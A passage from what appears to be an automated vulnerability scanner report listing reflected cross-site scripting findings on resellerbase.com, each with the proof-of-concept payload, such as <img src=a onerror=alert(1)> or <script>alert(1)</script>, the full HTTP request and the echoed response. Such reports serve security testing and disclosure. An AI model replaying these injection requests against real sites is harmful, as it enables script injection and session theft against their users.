User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesbd209<img src=a onerror=alert(1)>4b95d2754a3459867/review/search.php]</td>
...[SNIP]...

2.4583. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload e4c99</title><img%20src%3da%20onerror%3dalert(1)>cce581de37e was submitted in the REST URL parameter 4. This input was echoed as e4c99</title><img src=a onerror=alert(1)>cce581de37e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagese4c99</title><img%20src%3da%20onerror%3dalert(1)>cce581de37e/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagese4c99</title><img src=a onerror=alert(1)>cce581de37e/review/search.php</title>
...[SNIP]...

2.4584. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 9ba67</title><img%20src%3da%20onerror%3dalert(1)>719baa501e775e85c was submitted in the REST URL parameter 5. This input was echoed as 9ba67</title><img src=a onerror=alert(1)>719baa501e775e85c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review9ba67</title><img%20src%3da%20onerror%3dalert(1)>719baa501e775e85c/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review9ba67</title><img src=a onerror=alert(1)>719baa501e775e85c/search.php</title>
...[SNIP]...

2.4585. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2bd3<img%20src%3da%20onerror%3dalert(1)>df3a14074c9 was submitted in the REST URL parameter 5. This input was echoed as c2bd3<img src=a onerror=alert(1)>df3a14074c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewc2bd3<img%20src%3da%20onerror%3dalert(1)>df3a14074c9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/reviewc2bd3<img src=a onerror=alert(1)>df3a14074c9/search.php]</td>
...[SNIP]...

2.4586. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload a3053</title><img%20src%3da%20onerror%3dalert(1)>4bcbff037c1 was submitted in the REST URL parameter 5. This input was echoed as a3053</title><img src=a onerror=alert(1)>4bcbff037c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewa3053</title><img%20src%3da%20onerror%3dalert(1)>4bcbff037c1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/reviewa3053</title><img src=a onerror=alert(1)>4bcbff037c1/search.php</title>
...[SNIP]...

2.4587. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27cba<img%20src%3da%20onerror%3dalert(1)>252faeffd202e8092 was submitted in the REST URL parameter 5. This input was echoed as 27cba<img src=a onerror=alert(1)>252faeffd202e8092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review27cba<img%20src%3da%20onerror%3dalert(1)>252faeffd202e8092/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review27cba<img src=a onerror=alert(1)>252faeffd202e8092/search.php]</td>
...[SNIP]...

2.4588. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 23637<img%20src%3da%20onerror%3dalert(1)>9b94cc171c6 was submitted in the REST URL parameter 6. This input was echoed as 23637<img src=a onerror=alert(1)>9b94cc171c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php23637<img%20src%3da%20onerror%3dalert(1)>9b94cc171c6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php23637<img src=a onerror=alert(1)>9b94cc171c6]</td>
...[SNIP]...

2.4589. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d286<img%20src%3da%20onerror%3dalert(1)>8ebcf502a3bc7f618 was submitted in the REST URL parameter 6. This input was echoed as 4d286<img src=a onerror=alert(1)>8ebcf502a3bc7f618 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review/search.php4d286<img%20src%3da%20onerror%3dalert(1)>8ebcf502a3bc7f618?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php4d286<img src=a onerror=alert(1)>8ebcf502a3bc7f618]</td>
...[SNIP]...

2.4590. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 9b34b</title><img%20src%3da%20onerror%3dalert(1)>d7b32f9b2cb was submitted in the REST URL parameter 6. This input was echoed as 9b34b</title><img src=a onerror=alert(1)>d7b32f9b2cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php9b34b</title><img%20src%3da%20onerror%3dalert(1)>d7b32f9b2cb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php9b34b</title><img src=a onerror=alert(1)>d7b32f9b2cb</title>
...[SNIP]...

2.4591. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 63013</title><img%20src%3da%20onerror%3dalert(1)>c6cacd39496ee801f was submitted in the REST URL parameter 6. This input was echoed as 63013</title><img src=a onerror=alert(1)>c6cacd39496ee801f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review/search.php63013</title><img%20src%3da%20onerror%3dalert(1)>c6cacd39496ee801f?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php63013</title><img src=a onerror=alert(1)>c6cacd39496ee801f</title>
...[SNIP]...

2.4592. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload fd8f7</title><img%20src%3da%20onerror%3dalert(1)>c9529da182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8f7</title><img src=a onerror=alert(1)>c9529da182 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php/fd8f7</title><img%20src%3da%20onerror%3dalert(1)>c9529da182 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php/fd8f7</title><img src=a onerror=alert(1)>c9529da182</title>
...[SNIP]...

2.4593. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6cf5<img%20src%3da%20onerror%3dalert(1)>e5f88303d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6cf5<img src=a onerror=alert(1)>e5f88303d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php/b6cf5<img%20src%3da%20onerror%3dalert(1)>e5f88303d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php/b6cf5<img src=a onerror=alert(1)>e5f88303d6]</td>
...[SNIP]...

2.4594. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6dc9<script>alert(1)</script>bcec316272dd4f01c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagb6dc9<script>alert(1)</script>bcec316272dd4f01c/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb6dc9<script>alert(1)</script>bcec316272dd4f01c/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4595. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e075<script>alert(1)</script>8183dd4a139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4e075<script>alert(1)</script>8183dd4a139/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4e075<script>alert(1)</script>8183dd4a139/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4596. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb9ae<img%20src%3da%20onerror%3dalert(1)>421becb5a97 was submitted in the REST URL parameter 2. This input was echoed as fb9ae<img src=a onerror=alert(1)>421becb5a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesfb9ae<img%20src%3da%20onerror%3dalert(1)>421becb5a97/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesfb9ae<img src=a onerror=alert(1)>421becb5a97/kosmos/images/search.php]</td>
...[SNIP]...

2.4597. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2a54<img%20src%3da%20onerror%3dalert(1)>bf158524dead4838c was submitted in the REST URL parameter 2. This input was echoed as c2a54<img src=a onerror=alert(1)>bf158524dead4838c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themesc2a54<img%20src%3da%20onerror%3dalert(1)>bf158524dead4838c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesc2a54<img src=a onerror=alert(1)>bf158524dead4838c/kosmos/images/search.php]</td>
...[SNIP]...

2.4598. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

